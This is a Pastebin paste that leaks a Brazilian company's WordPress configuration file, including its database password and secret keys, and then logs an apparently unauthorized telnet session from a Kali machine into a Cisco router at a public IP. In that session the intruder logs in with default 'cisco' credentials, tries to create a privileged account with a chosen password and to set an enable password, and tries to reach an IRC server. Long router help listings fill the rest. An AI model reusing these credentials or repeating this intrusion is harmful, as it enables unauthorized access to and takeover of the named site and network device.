Advertisement
Guest User

foundby null

a guest
Feb 11th, 2016
588
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Pawn 73.25 KB | None | 0 0
  1. http://www.rolamentosradial.com.br/<?php
  2. /**
  3.  * As configurações básicas do WordPress.
  4.  *
  5.  * Esse arquivo contém as seguintes configurações: configurações de MySQL, Prefixo de Tabelas,
  6.  * Chaves secretas, Idioma do WordPress, e ABSPATH. Você pode encontrar mais informações
  7.  * visitando {@link http://codex.wordpress.org/Editing_wp-config.php Editing
  8.  * wp-config.php} Codex page. Você pode obter as configurações de MySQL de seu servidor de hospedagem.
  9.  *
  10.  * Esse arquivo é usado pelo script ed criação wp-config.php durante a
  11.  * instalação. Você não precisa usar o site, você pode apenas salvar esse arquivo
  12.  * como "wp-config.php" e preencher os valores.
  13.  *
  14.  * @package WordPress
  15.  */
  16.  
  17. // ** Configurações do MySQL - Você pode pegar essas informações com o serviço de hospedagem ** //
  18. /** O nome do banco de dados do WordPress */
  19. define('DB_NAME', 'rolament_radial');
  20.  
  21. /** Usuário do banco de dados MySQL */
  22. define('DB_USER', 'rolament_root');
  23.  
  24. /** Senha do banco de dados MySQL */
  25. define('DB_PASSWORD', '088y44q1uz4EMHq8Ok2N');
  26.  
  27. /** nome do host do MySQL */
  28. define('DB_HOST', 'localhost');
  29.  
  30. /** Conjunto de caracteres do banco de dados a ser usado na criação das tabelas. */
  31. define('DB_CHARSET', 'utf8');
  32.  
  33. /** O tipo de collate do banco de dados. Não altere isso se tiver dúvidas. */
  34. define('DB_COLLATE', '');
  35.  
  36. /**#@+
  37.  * Chaves únicas de autenticação e salts.
  38.  *
  39.  * Altere cada chave para um frase única!
  40.  * Você pode gerá-las usando o {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
  41.  * Você pode alterá-las a qualquer momento para desvalidar quaisquer cookies existentes. Isto irá forçar todos os usuários a fazerem login novamente.
  42.  *
  43.  * @since 2.6.0
  44.  */
  45. define('AUTH_KEY',         '6 wH;Klap!uvvh1!(911{7]sFD).Sqrui~qT5&HhVbss0tI{C4EFW*LZ6EipZ.`3');
  46. define('SECURE_AUTH_KEY',  '57HC!vSc:}morPO^uvu`D7%Ng*FM)>c=o7`C[A3ca *w/d;+%[I3i%/)2h.{05-b');
  47. define('LOGGED_IN_KEY',    '#r#?X5KG0a_nSl^B`_xX>]?<zf]XxnihmfLu?UiRp{1<!ldg+xJF<m|]a##=:{^/');
  48. define('NONCE_KEY',        '0f~[!W|pwKY@M${Ur0QXs$co3zdot)mvwM21dq)Izbb(CP5@*fVbf6lC{r]W0z.O');
  49. define('AUTH_SALT',        'BipQG8#4b%~A*pk8(H7Qy}=LUS)15}PO8p1.95?Xa4[4z,rf,tSgGt*{ Necs< h');
  50. define('SECURE_AUTH_SALT', '6FL}h^t5-G6nE3lJ@urKMSsvaI~(Xg@z1:%vb<tHYD>-V.cZPN!Ue:FncCOp[brQ');
  51. define('LOGGED_IN_SALT',   '!EqB`I(]=iOq`i!enzL&`8VP|^z/6f:y#e*_e9!qRA(|0,$1!lrx9B?(y{Zt^MpT');
  52. define('NONCE_SALT',       'p<EOq=SG{C|J*4335D^$~9o|HXmX{rd2M~))Vs5T#VHF~.7z9>|H1B~Za.!Bi/GG');
  53.  
  54. /**#@-*/
  55.  
  56. /**
  57.  * Prefixo da tabela do banco de dados do WordPress.
  58.  *
  59.  * Você pode ter várias instalações em um único banco de dados se você der para cada um um único
  60.  * prefixo. Somente números, letras e sublinhados!
  61.  */
  62. $table_prefix  = 'wp_';
  63.  
  64. /**
  65.  * O idioma localizado do WordPress é o inglês por padrão.
  66.  *
  67.  * Altere esta definição para localizar o WordPress. Um arquivo MO correspondente ao
  68.  * idioma escolhido deve ser instalado em wp-content/languages. Por exemplo, instale
  69.  * pt_BR.mo em wp-content/languages e altere WPLANG para 'pt_BR' para habilitar o suporte
  70.  * ao português do Brasil.
  71.  */
  72. define('WPLANG', 'pt_BR');
  73.  
  74. /**
  75.  * Para desenvolvedores: Modo debugging WordPress.
  76.  *
  77.  * altere isto para true para ativar a exibição de avisos durante o desenvolvimento.
  78.  * é altamente recomendável que os desenvolvedores de plugins e temas usem o WP_DEBUG
  79.  * em seus ambientes de desenvolvimento.
  80.  */
  81. define('WP_DEBUG', false);
  82. @ini_set('display_errors', 1);
  83.  
  84. /* Isto é tudo, pode parar de editar! :) */
  85.  
  86. /** Caminho absoluto para o diretório WordPress. */
  87. if ( !defined('ABSPATH') )
  88.     define('ABSPATH', dirname(__FILE__) . '/');
  89.    
  90. /** Configura as variáveis do WordPress e arquivos inclusos. */
  91. require_once(ABSPATH . 'wp-settings.php');
  92.  
  93.  
  94.  
  95. next
  96. <?php
  97. /**
  98.  * As configurações básicas do WordPress.
  99.  *
  100.  * Esse arquivo contém as seguintes configurações: configurações de MySQL, Prefixo de Tabelas,
  101.  * Chaves secretas, Idioma do WordPress, e ABSPATH. Você pode encontrar mais informações
  102.  * visitando {@link http://codex.wordpress.org/Editing_wp-config.php Editing
  103.  * wp-config.php} Codex page. Você pode obter as configurações de MySQL de seu servidor de hospedagem.
  104.  *
  105.  * Esse arquivo é usado pelo script ed criação wp-config.php durante a
  106.  * instalação. Você não precisa usar o site, você pode apenas salvar esse arquivo
  107.  * como "wp-config.php" e preencher os valores.
  108.  *
  109.  * @package WordPress
  110.  */
  111.  
  112. // ** Configurações do MySQL - Você pode pegar essas informações com o serviço de hospedagem ** //
  113. /** O nome do banco de dados do WordPress */
  114. define('DB_NAME', 'rolament_radial');
  115.  
  116. /** Usuário do banco de dados MySQL */
  117. define('DB_USER', 'rolament_root');
  118.  
  119. /** Senha do banco de dados MySQL */
  120. define('DB_PASSWORD', '088y44q1uz4EMHq8Ok2N');
  121.  
  122. /** nome do host do MySQL */
  123. define('DB_HOST', 'localhost');
  124.  
  125. /** Conjunto de caracteres do banco de dados a ser usado na criação das tabelas. */
  126. define('DB_CHARSET', 'utf8');
  127.  
  128. /** O tipo de collate do banco de dados. Não altere isso se tiver dúvidas. */
  129. define('DB_COLLATE', '');
  130.  
  131. /**#@+
  132.  * Chaves únicas de autenticação e salts.
  133.  *
  134.  * Altere cada chave para um frase única!
  135.  * Você pode gerá-las usando o {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
  136.  * Você pode alterá-las a qualquer momento para desvalidar quaisquer cookies existentes. Isto irá forçar todos os usuários a fazerem login novamente.
  137.  *
  138.  * @since 2.6.0
  139.  */
  140. define('AUTH_KEY',         '6 wH;Klap!uvvh1!(911{7]sFD).Sqrui~qT5&HhVbss0tI{C4EFW*LZ6EipZ.`3');
  141. define('SECURE_AUTH_KEY',  '57HC!vSc:}morPO^uvu`D7%Ng*FM)>c=o7`C[A3ca *w/d;+%[I3i%/)2h.{05-b');
  142. define('LOGGED_IN_KEY',    '#r#?X5KG0a_nSl^B`_xX>]?<zf]XxnihmfLu?UiRp{1<!ldg+xJF<m|]a##=:{^/');
  143. define('NONCE_KEY',        '0f~[!W|pwKY@M${Ur0QXs$co3zdot)mvwM21dq)Izbb(CP5@*fVbf6lC{r]W0z.O');
  144. define('AUTH_SALT',        'BipQG8#4b%~A*pk8(H7Qy}=LUS)15}PO8p1.95?Xa4[4z,rf,tSgGt*{ Necs< h');
  145. define('SECURE_AUTH_SALT', '6FL}h^t5-G6nE3lJ@urKMSsvaI~(Xg@z1:%vb<tHYD>-V.cZPN!Ue:FncCOp[brQ');
  146. define('LOGGED_IN_SALT',   '!EqB`I(]=iOq`i!enzL&`8VP|^z/6f:y#e*_e9!qRA(|0,$1!lrx9B?(y{Zt^MpT');
  147. define('NONCE_SALT',       'p<EOq=SG{C|J*4335D^$~9o|HXmX{rd2M~))Vs5T#VHF~.7z9>|H1B~Za.!Bi/GG');
  148.  
  149. /**#@-*/
  150.  
  151. /**
  152.  * Prefixo da tabela do banco de dados do WordPress.
  153.  *
  154.  * Você pode ter várias instalações em um único banco de dados se você der para cada um um único
  155.  * prefixo. Somente números, letras e sublinhados!
  156.  */
  157. $table_prefix  = 'wp_';
  158.  
  159. /**
  160.  * O idioma localizado do WordPress é o inglês por padrão.
  161.  *
  162.  * Altere esta definição para localizar o WordPress. Um arquivo MO correspondente ao
  163.  * idioma escolhido deve ser instalado em wp-content/languages. Por exemplo, instale
  164.  * pt_BR.mo em wp-content/languages e altere WPLANG para 'pt_BR' para habilitar o suporte
  165.  * ao português do Brasil.
  166.  */
  167. define('WPLANG', 'pt_BR');
  168.  
  169. /**
  170.  * Para desenvolvedores: Modo debugging WordPress.
  171.  *
  172.  * altere isto para true para ativar a exibição de avisos durante o desenvolvimento.
  173.  * é altamente recomendável que os desenvolvedores de plugins e temas usem o WP_DEBUG
  174.  * em seus ambientes de desenvolvimento.
  175.  */
  176. define('WP_DEBUG', false);
  177. @ini_set('display_errors', 1);
  178.  
  179. /* Isto é tudo, pode parar de editar! :) */
  180.  
  181. /** Caminho absoluto para o diretório WordPress. */
  182. if ( !defined('ABSPATH') )
  183.     define('ABSPATH', dirname(__FILE__) . '/');
  184.    
  185. /** Configura as variáveis do WordPress e arquivos inclusos. */
  186. require_once(ABSPATH . 'wp-settings.php');
  187.  
  188. more
  189. root@kali:~# telnet 37.216.203.202
  190. Trying 37.216.203.202...
  191. Connected to 37.216.203.202.
  192. Escape character is '^]'.
  193.  You guys should probably make your routers more secure !  
  194. -----------------------------------------------------------------------
  195. Cisco Configuration Professional (Cisco CP) is installed on this device.
  196. This feature requires the one-time use of the username "cisco" with the
  197. password "cisco". These default credentials have a privilege level of 15.
  198.  
  199. YOU MUST USE CISCO CP or the CISCO IOS CLI TO CHANGE THESE  
  200. PUBLICLY-KNOWN CREDENTIALS
  201.  
  202. Here are the Cisco IOS commands.
  203.  
  204. username <myuser>  privilege 15 secret 0 <mypassword>
  205. no username cisco
  206.  
  207. Replace <myuser> and <mypassword> with the username and password you want
  208. to use.
  209.  
  210. IF YOU DO NOT CHANGE THE PUBLICLY-KNOWN CREDENTIALS, YOU WILL
  211. NOT BE ABLE TO LOG INTO THE DEVICE AGAIN AFTER YOU HAVE LOGGED OFF.
  212.  
  213. For more information about Cisco CP please follow the instructions in the
  214. QUICK START GUIDE for your router or go to http://www.cisco.com/go/ciscocp
  215. -----------------------------------------------------------------------
  216.  
  217.  
  218. User Access Verification
  219.  
  220. Username: cisco
  221. Password:
  222. % Password expiration warning.
  223. -----------------------------------------------------------------------
  224.  
  225. Cisco Configuration Professional (Cisco CP) is installed on this device
  226. and it provides the default username "cisco" for  one-time use. If you have
  227. already used the username "cisco" to login to the router and your IOS image
  228. supports the "one-time" user option, then this username has already expired.
  229. You will not be able to login to the router with this username after you exit
  230. this session.
  231.  
  232. It is strongly suggested that you create a new username with a privilege level
  233. of 15 using the following command.
  234.  
  235. username <myuser> privilege 15 secret 0 <mypassword>
  236.  
  237. Replace <myuser> and <mypassword> with the username and password you
  238. want to use.
  239.  
  240. -----------------------------------------------------------------------
  241.  
  242. Burooj_ALIA_RTR_DIA#username nxfrx privilege 15 secret 0 h4ndikud4
  243.                      ^
  244. % Invalid input detected at '^' marker.
  245.  
  246. Burooj_ALIA_RTR_DIA#help
  247. Help may be requested at any point in a command by entering
  248. a question mark '?'.  If nothing matches, the help list will
  249. be empty and you must backup until entering a '?' shows the
  250. available options.
  251. Two styles of help are provided:
  252. 1. Full help is available when you are ready to enter a
  253.    command argument (e.g. 'show ?') and describes each possible
  254.    argument.
  255. 2. Partial help is provided when an abbreviated argument is entered
  256.    and you want to know what arguments match the input
  257.    (e.g. 'show pr?'.)
  258.  
  259. Burooj_ALIA_RTR_DIA#show ?
  260.   aaa                       Show AAA values
  261.   aal2                      Show commands for AAL2
  262.   access-expression         List access expression
  263.   access-lists              List access lists
  264.   acircuit                  Access circuit info
  265.   adjacency                 Adjacent nodes
  266.   aliases                   Display alias commands
  267.   alignment                 Show alignment information
  268.   appfw                     Application Firewall information
  269.   application               Application Routing
  270.   archive                   Archive functions
  271.   arp                       ARP table
  272.   async                     Information on terminal lines used as router interfaces
  273.   authentication            Shows Auth Manager registrations or sessions
  274.   auto                      Show Automation Template
  275.   autoupgrade               Show autoupgrade related information
  276.   backhaul-session-manager  Backhaul Session Manager information
  277.   backup                    Backup status
  278.   beep                      Show BEEP information
  279.   bfd                       BFD protocol info
  280.   bgp                       BGP information
  281.   bridge                    Bridge Forwarding/Filtering Database [verbose]
  282.   bsc                       BSC interface information
  283.   bstun                     BSTUN interface information
  284.   buffers                   Buffer pool statistics
  285.   cache                     Shows Device-Sensor Cache Informations
  286.   calendar                  Display the hardware calendar
  287.   call                      Show call
  288.   call-home                 Show command for call home
  289.   call-manager-fallback     Show call-manager fallback configuration & stats
  290.   caller                    Display information about dialup connections
  291.   callmon                   Show call monitor info
  292.   capability                Capability Information
  293.   capf-server               Display CAPF server details
  294.   cca                       CCA information
  295.   cce                       Common Classification Engine (CCE)
  296.   ccm-manager               Call Manager Application information
  297.   cdapi                     CDAPI information
  298.   cdp                       CDP information
  299.   cef                       CEF address family independent status
  300.   cisp                      Shows CISP information
  301.   class-map                 Show CPL Class Map
  302.   clock                     Display the system clock
  303.   cls                       DLC user information
  304.   cns                       CNS agents
  305.   compress                  Show compression statistics
  306.   configuration             Contents of Non-Volatile memory
  307.   connection                Show Connection
  308.   content-scan              Shows content-scan information
  309.   control-plane             Control Plane information
  310.   controllers               Interface controller status
  311.   cops                      COPS information
  312.   credentials               Show credentials service configuration
  313.   crm                       Carrier Resource Manager info
  314.   crypto                    Encryption module
  315.   csdb                      Show CSDB Information
  316.   cti                       Computer Telephony Integration info
  317.   ctl-client                Display CTL Client details
  318.   cts                       Cisco Trusted Security information
  319.   cube                      Show cube info
  320.   cwmp                      Show CPE WAN Management Protocol(cwmp) information
  321.   dampening                 Display dampening information
  322.   data-corruption           Show data errors
  323.   database                  Show Database
  324.   dcm                       Data Collection Manager Core Details
  325.   debugging                 State of each debugging option
  326.   derived-config            Derived operating configuration
  327.   device-sensor             Shows Device Sensor Information
  328.   dhcp                      Dynamic Host Configuration Protocol status
  329.   diag                      Show diagnostic information for port adapters/modules
  330.   dial-peer                 Dial Plan Mapping Table for, e.g. VoIP Peers
  331.   dialer                    Dialer parameters and statistics
  332.   dialplan                  Voice telephony dial plan
  333.   dmvpn                     Display DMVPN session related information
  334.   dn-numbers                Directory number information of CME
  335.   dnsix                     Shows Dnsix/DMDP information
  336.   dot1q-tunnel              Display dot1q tunnel ports
  337.   dot1x                     Dot1x information
  338.   dsp-group                 DSP group
  339.   dspfarm                   Display DSPFARM related information
  340.   dtp                       DTP information
  341.   eap                       Shows EAP registration/session information
  342.   ecfmpal                   Show ECFM Commands
  343.   eigrp                     EIGRP show commands
  344.   energywise                EnergyWise show commands
  345.   entry                     Queued terminal entries
  346.   environment               Environmental monitor statistics
  347.   eou                       EAPoUDP
  348.   ephone                    Show all or one ephone status
  349.   ephone-dn                 Show all or one IP phone line
  350.   ephone-hunt               Show all or one hunt group
  351.   epm                       EPM information
  352.   errdisable                Error disable
  353.   eswilp                    Marvel ATU & VTU table dump
  354.   ethernet                  Ethernet parameters
  355.   event                     Embedded event related commands
  356.   event-manager             Event manager information
  357.   exception                 exception information
  358.   fastblk                   fastblk memory information
  359.   fb-its-log                Call-Manager-Fallback or IP Telephony Service Log
  360.   file                      Show filesystem information
  361.   flash:                    display information about flash: file system
  362.   flow                      Flow information
  363.   flow-sampler              Display the flow samplers configured
  364.   format                    Show format information
  365.   frame-relay               Frame-Relay information
  366.   funi                      FUNI information
  367.   gateway                   Show status of gateway
  368.   glbp                      GLBP information
  369.   h323                      Show H.323 VoIP information
  370.   hardware                  Hardware specific information
  371.   history                   Display the session command history
  372.   hosts                     IP domain-name, lookup style, nameservers, and host table
  373.   html                      HTML helper commands
  374.   http                      Display HTTP info
  375.   id-manager                ID pool manager
  376.   idb                       List of Interface Descriptor Blocks
  377.   identity                  Identity profiles and policies
  378.   idmgr                     IDMGR interaction
  379.   if-mgr                    if-mgr information
  380.   interfaces                Interface status and configuration
  381.   inventory                 Show the physical inventory
  382.   ip                        IP information
  383.   ipam                      IP Addr Mgr (IPAM) information
  384.   ipc                       Interprocess communications commands
  385.   iphc-profile              Show IPHC Profile
  386.   ipv6                      IPv6 information
  387.   iua                       ISDN User Adaptation Layer information
  388.   key                       Key information
  389.   keystore                  Show keystore information
  390.   kron                      Kron Subsystem
  391.   l2cac                     L2 CAC
  392.   l2protocol-tunnel         Display L2PT status and configurations
  393.   l3vpn                     l3vpn encapsulation ip commands
  394.   l4f                       L4F details
  395.   license                   Show license information
  396.   line                      TTY line information
  397.   lisp                      Locator/ID Separation Protocol
  398.   llc2                      IBM LLC2 circuit information
  399.   lldp                      LLDP information
  400.   location                  Display the system location
  401.   logging                   Show the contents of logging buffers
  402.   login                     Display Secure Login Configurations and State
  403.   mab                       MAB information
  404.   mac-address-table         MAC forwarding table
  405.   mace                      Measurements Aggregation and Correlation Engine
  406.   management-interface      Host management-interface information
  407.   mdf                       Show the names of configured EMM menus
  408.   media                     Display media related information
  409.   memory                    Memory statistics
  410.   mfib                      MFIB address family independent status
  411.   mgcp                      Display Media Gateway Control Protocol information
  412.   microcode                 show configured microcode for downloadable hardware
  413.   modem                     Show modem
  414.   modemcap                  Show Modem Capabilities database
  415.   monitor                   Monitoring different system events
  416.   mpls                      MPLS information
  417.   mrcp                      MRCP information
  418.   mtm                       MTM
  419.   mwi                       mwi related information
  420.   nbf                       NBF (NetBEUI) information
  421.   netconf                   Show NETCONF information
  422.   nhrp                      Display NHRP related information
  423.   ntp                       Network time protocol
  424.   num-exp                   Number Expansion (Speed Dial) information
  425.   object-group              List object groups
  426.   odm-format                Show the schema used for ODM input file
  427.   onep                      ONEP related commands
  428.   ospfv3                    OSPFv3 information
  429.   parameter-map             parameter map information
  430.   parser                    Display parser information
  431.   pas                       Port Adaptor Information
  432.   pci                       PCI Information
  433.   per-call                  Per call debug
  434.   performance               Media Monitor show commands
  435.   persistent                Show persistent information
  436.   pfr                       Performance Routing(PfR) information
  437.   platform                  Displays platform information
  438.   pm                        Show Port Manager commands
  439.   policy-firewall           Show policy-firewall
  440.   policy-manager            Policy Manager
  441.   policy-map                Show Policy Map
  442.   ppp                       PPP parameters and statistics
  443.   pppatm                    PPP over ATM
  444.   pppoe                     PPPoE information
  445.   privilege                 Show current privilege level
  446.   processes                 Active process statistics
  447.   protocols                 Active network routing protocols
  448.   radius                    Shows radius information
  449.   raw-socket                Information for raw socket
  450.   rbscp                     RBSCP information
  451.   region                    Region Manager Status
  452.   registry                  Function registry information
  453.   reload                    Scheduled reload information
  454.   resource                  Display Resource Usage/Relations and more details
  455.   rhosts                    Remote-host+user equivalences
  456.   rib                       Routing Information Base
  457.   rif                       RIF cache entries
  458.   rmon                      rmon statistics
  459.   rom-monitor               show ROMMON region information
  460.   route-map                 route-map information
  461.   route-tag                 route-tag information
  462.   rpms-proc                 RPMS Process Information
  463.   rtpspi                    RTP Service Provider Interface
  464.   rtsp                      Real Time Streaming Protocol information
  465.   rudpv1                    Rudpv1 information
  466.   running-config            Current operating configuration
  467.   sampler                   Sampler information
  468.   sasl                      show SASL information
  469.   sccp                      Display Skinny Client Control Protocol information
  470.   scp                       SCP commands
  471.   sctp                      SCTP information
  472.   sdspfarm                  Show dspfarm status from SCCP server
  473.   secure                    Show secure image and configuration archive
  474.   service-routing           Service-Routing show commands
  475.   sessions                  Information about Telnet connections
  476.   shared-line               Show shared-line info
  477.   sip-ua                    Show SIP User Agent
  478.   smf                       Software MAC filter
  479.   snap                      Show information on SNAP server
  480.   snapshot                  Snapshot parameters and statistics
  481.   snmp                      snmp statistics
  482.   sntp                      Simple network time protocol
  483.   sockets                   Socket Details
  484.   software                  List software information
  485.   spanning-tree             Spanning tree topology
  486.   ssh                       Status of SSH server connections
  487.   ssm                       Segment Switching Manager Status
  488.   stacks                    Process stack utilization
  489.   standby                   Hot Standby Router Protocol (HSRP) information
  490.   startup-config            Contents of startup configuration
  491.   stcapp                    show SCCP Telephony
  492.   storm-control             Show packet storm control configuration
  493.   stun                      STUN status and configuration
  494.   subscriber                Subscriber Service Switch Information
  495.   subscriber-policy         Subscriber policy
  496.   subscription              Subscription information to show
  497.   subsys                    Show subsystem information
  498.   table-map                 Show Table Map
  499.   tacacs                    Shows tacacs+ server statistics
  500.   tcp                       Status of TCP connections
  501.   tech-support              Show system information for Tech-Support
  502.   telephony-service         Show Cisco IOS Telephony Service Configuration & Stats
  503.   template                  Template information
  504.   terminal                  Display terminal configuration parameters
  505.   test_rib_access           RIB_ACCESS TEST info
  506.   time-range                Time range
  507.   topology                  Topology instance information
  508.   track                     Tracking information
  509.   translate                 Protocol translation information
  510.   translation-rule          Show translation rule table
  511.   trunk                     Trunk Group info
  512.   tunnel                    Show configured tunnels
  513.   udp                       UDP Details
  514.   usb                       USB Interface
  515.   user-group                Display User Group information
  516.   users                     Display information about terminal lines
  517.   vc-group                  Show VC Group
  518.   version                   System hardware and software status
  519.   video                     Video monitoring stats
  520.   vlan-switch               VTP VLAN status
  521.   vlans                     Virtual LANs Information
  522.   vnet                      Virtual NETwork instance information
  523.   voice                     Voice port configuration, mon-channels & stats
  524.   voip                      Voice over Internet Protocol information
  525.   vpdn                      VPDN information
  526.   vrf                       VPN Routing/Forwarding instance information
  527.   vrrp                      VRRP information
  528.   vsp                       Voice Streaming Processing information
  529.   vstack                    Vstack show commands
  530.   vtemplate                 Virtual Template interface information
  531.   vtp                       VTP information
  532.   waas                      IOS Wide Area Application Services
  533.   warm-reboot               Show Warm Reboot related information
  534.   wccp                      WCCP information
  535.   webvpn                    WebVPN information
  536.   whoami                    Info on current tty line
  537.   wrr-queue                 WRR queue
  538.   wsma                      Show Web Services Management Agents information
  539.   x25                       X.25 information
  540.   x28                       X.28 rotary information
  541.   x29                       X.29 information
  542.   xconnect                  Xconnect information
  543.   xos                       Cross-OS Library Information and Traces
  544.   xsd-format                Show the ODM XSD for the command
  545.   zone                      Zone Information
  546.   zone-pair                 Zone pair information
  547.          
  548. Burooj_ALIA_RTR_DIA#show
  549. % Type "show ?" for a list of subcommands
  550. Burooj_ALIA_RTR_DIA#
  551. Burooj_ALIA_RTR_DIA#
  552. Burooj_ALIA_RTR_DIA#
  553. Burooj_ALIA_RTR_DIA#
  554. Burooj_ALIA_RTR_DIA#
  555. Burooj_ALIA_RTR_DIA#
  556. Burooj_ALIA_RTR_DIA#
  557. Burooj_ALIA_RTR_DIA#
  558. Burooj_ALIA_RTR_DIA#
  559. Burooj_ALIA_RTR_DIA#
  560. Burooj_ALIA_RTR_DIA#
  561. Burooj_ALIA_RTR_DIA#
  562. Burooj_ALIA_RTR_DIA#
  563. Burooj_ALIA_RTR_DIA#
  564. Burooj_ALIA_RTR_DIA#
  565. Burooj_ALIA_RTR_DIA#
  566. Burooj_ALIA_RTR_DIA#
  567. Burooj_ALIA_RTR_DIA#
  568. Burooj_ALIA_RTR_DIA#
  569. Burooj_ALIA_RTR_DIA#
  570. Burooj_ALIA_RTR_DIA#
  571. Burooj_ALIA_RTR_DIA#
  572. Burooj_ALIA_RTR_DIA#
  573. Burooj_ALIA_RTR_DIA#
  574. Burooj_ALIA_RTR_DIA#
  575. Burooj_ALIA_RTR_DIA#
  576. Burooj_ALIA_RTR_DIA#
  577. Burooj_ALIA_RTR_DIA#
  578. Burooj_ALIA_RTR_DIA#
  579. Burooj_ALIA_RTR_DIA#
  580. Burooj_ALIA_RTR_DIA#
  581. Burooj_ALIA_RTR_DIA#
  582. Burooj_ALIA_RTR_DIA#show ssh
  583. %No SSHv2 server connections running.
  584. %No SSHv1 server connections running.
  585. Burooj_ALIA_RTR_DIA#telnet irc.freenode.net
  586. Translating "irc.freenode.net"
  587.  
  588. % Bad IP address or host name
  589. Burooj_ALIA_RTR_DIA# {passwd | password} iltluFp
  590.                      ^
  591. % Invalid input detected at '^' marker.
  592.  
  593. Burooj_ALIA_RTR_DIA#password
  594. Translating "password"
  595.  
  596. % Bad IP address or host name
  597. Translating "password"
  598.  
  599. % Unknown command or computer name, or unable to find computer address
  600. Burooj_ALIA_RTR_DIA#passwd
  601. Translating "passwd"
  602.  
  603. % Bad IP address or host name
  604. Translating "passwd"
  605.  
  606. % Unknown command or computer name, or unable to find computer address
  607. Burooj_ALIA_RTR_DIA#enable password iltlufp
  608.                            ^
  609. % Invalid input detected at '^' marker.
  610.  
  611. Burooj_ALIA_RTR_DIA#show ?
  612.   aaa                       Show AAA values
  613.   aal2                      Show commands for AAL2
  614.   access-expression         List access expression
  615.   access-lists              List access lists
  616.   acircuit                  Access circuit info
  617.   adjacency                 Adjacent nodes
  618.   aliases                   Display alias commands
  619.   alignment                 Show alignment information
  620.   appfw                     Application Firewall information
  621.   application               Application Routing
  622.   archive                   Archive functions
  623.   arp                       ARP table
  624.   async                     Information on terminal lines used as router interfaces
  625.   authentication            Shows Auth Manager registrations or sessions
  626.   auto                      Show Automation Template
  627.   autoupgrade               Show autoupgrade related information
  628.   backhaul-session-manager  Backhaul Session Manager information
  629.   backup                    Backup status
  630.   beep                      Show BEEP information
  631.   bfd                       BFD protocol info
  632.   bgp                       BGP information
  633.   bridge                    Bridge Forwarding/Filtering Database [verbose]
  634.   bsc                       BSC interface information
  635.   bstun                     BSTUN interface information
  636.   buffers                   Buffer pool statistics
  637.   cache                     Shows Device-Sensor Cache Informations
  638.   calendar                  Display the hardware calendar
  639.   call                      Show call
  640.   call-home                 Show command for call home
  641.   call-manager-fallback     Show call-manager fallback configuration & stats
  642.   caller                    Display information about dialup connections
  643.   callmon                   Show call monitor info
  644.   capability                Capability Information
  645.   capf-server               Display CAPF server details
  646.   cca                       CCA information
  647.   cce                       Common Classification Engine (CCE)
  648.   ccm-manager               Call Manager Application information
  649.   cdapi                     CDAPI information
  650.   cdp                       CDP information
  651.   cef                       CEF address family independent status
  652.   cisp                      Shows CISP information
  653.   class-map                 Show CPL Class Map
  654.   clock                     Display the system clock
  655.   cls                       DLC user information
  656.   cns                       CNS agents
  657.   compress                  Show compression statistics
  658.   configuration             Contents of Non-Volatile memory
  659.   connection                Show Connection
  660.   content-scan              Shows content-scan information
  661.   control-plane             Control Plane information
  662.   controllers               Interface controller status
  663.   cops                      COPS information
  664.   credentials               Show credentials service configuration
  665.   crm                       Carrier Resource Manager info
  666.   crypto                    Encryption module
  667.   csdb                      Show CSDB Information
  668.   cti                       Computer Telephony Integration info
  669.   ctl-client                Display CTL Client details
  670.   cts                       Cisco Trusted Security information
  671.   cube                      Show cube info
  672.   cwmp                      Show CPE WAN Management Protocol(cwmp) information
  673.   dampening                 Display dampening information
  674.   data-corruption           Show data errors
  675.   database                  Show Database
  676.   dcm                       Data Collection Manager Core Details
  677.   debugging                 State of each debugging option
  678.   derived-config            Derived operating configuration
  679.   device-sensor             Shows Device Sensor Information
  680.   dhcp                      Dynamic Host Configuration Protocol status
  681.   diag                      Show diagnostic information for port adapters/modules
  682.   dial-peer                 Dial Plan Mapping Table for, e.g. VoIP Peers
  683.   dialer                    Dialer parameters and statistics
  684.   dialplan                  Voice telephony dial plan
  685.   dmvpn                     Display DMVPN session related information
  686.   dn-numbers                Directory number information of CME
  687.   dnsix                     Shows Dnsix/DMDP information
  688.   dot1q-tunnel              Display dot1q tunnel ports
  689.   dot1x                     Dot1x information
  690.   dsp-group                 DSP group
  691.   dspfarm                   Display DSPFARM related information
  692.   dtp                       DTP information
  693.   eap                       Shows EAP registration/session information
  694.   ecfmpal                   Show ECFM Commands
  695.   eigrp                     EIGRP show commands
  696.   energywise                EnergyWise show commands
  697.   entry                     Queued terminal entries
  698.   environment               Environmental monitor statistics
  699.   eou                       EAPoUDP
  700.   ephone                    Show all or one ephone status
  701.   ephone-dn                 Show all or one IP phone line
  702.   ephone-hunt               Show all or one hunt group
  703.   epm                       EPM information
  704.   errdisable                Error disable
  705.   eswilp                    Marvel ATU & VTU table dump
  706.   ethernet                  Ethernet parameters
  707.   event                     Embedded event related commands
  708.   event-manager             Event manager information
  709.   exception                 exception information
  710.   fastblk                   fastblk memory information
  711.   fb-its-log                Call-Manager-Fallback or IP Telephony Service Log
  712.   file                      Show filesystem information
  713.   flash:                    display information about flash: file system
  714.   flow                      Flow information
  715.   flow-sampler              Display the flow samplers configured
  716.   format                    Show format information
  717.   frame-relay               Frame-Relay information
  718.   funi                      FUNI information
  719.   gateway                   Show status of gateway
  720.   glbp                      GLBP information
  721.   h323                      Show H.323 VoIP information
  722.   hardware                  Hardware specific information
  723.   history                   Display the session command history
  724.   hosts                     IP domain-name, lookup style, nameservers, and host table
  725.   html                      HTML helper commands
  726.   http                      Display HTTP info
  727.   id-manager                ID pool manager
  728.   idb                       List of Interface Descriptor Blocks
  729.   identity                  Identity profiles and policies
  730.   idmgr                     IDMGR interaction
  731.   if-mgr                    if-mgr information
  732.   interfaces                Interface status and configuration
  733.   inventory                 Show the physical inventory
  734.   ip                        IP information
  735.   ipam                      IP Addr Mgr (IPAM) information
  736.   ipc                       Interprocess communications commands
  737.   iphc-profile              Show IPHC Profile
  738.   ipv6                      IPv6 information
  739.   iua                       ISDN User Adaptation Layer information
  740.   key                       Key information
  741.   keystore                  Show keystore information
  742.   kron                      Kron Subsystem
  743.   l2cac                     L2 CAC
  744.   l2protocol-tunnel         Display L2PT status and configurations
  745.   l3vpn                     l3vpn encapsulation ip commands
  746.   l4f                       L4F details
  747.   license                   Show license information
  748.   line                      TTY line information
  749.   lisp                      Locator/ID Separation Protocol
  750.   llc2                      IBM LLC2 circuit information
  751.   lldp                      LLDP information
  752.   location                  Display the system location
  753.   logging                   Show the contents of logging buffers
  754.   login                     Display Secure Login Configurations and State
  755.   mab                       MAB information
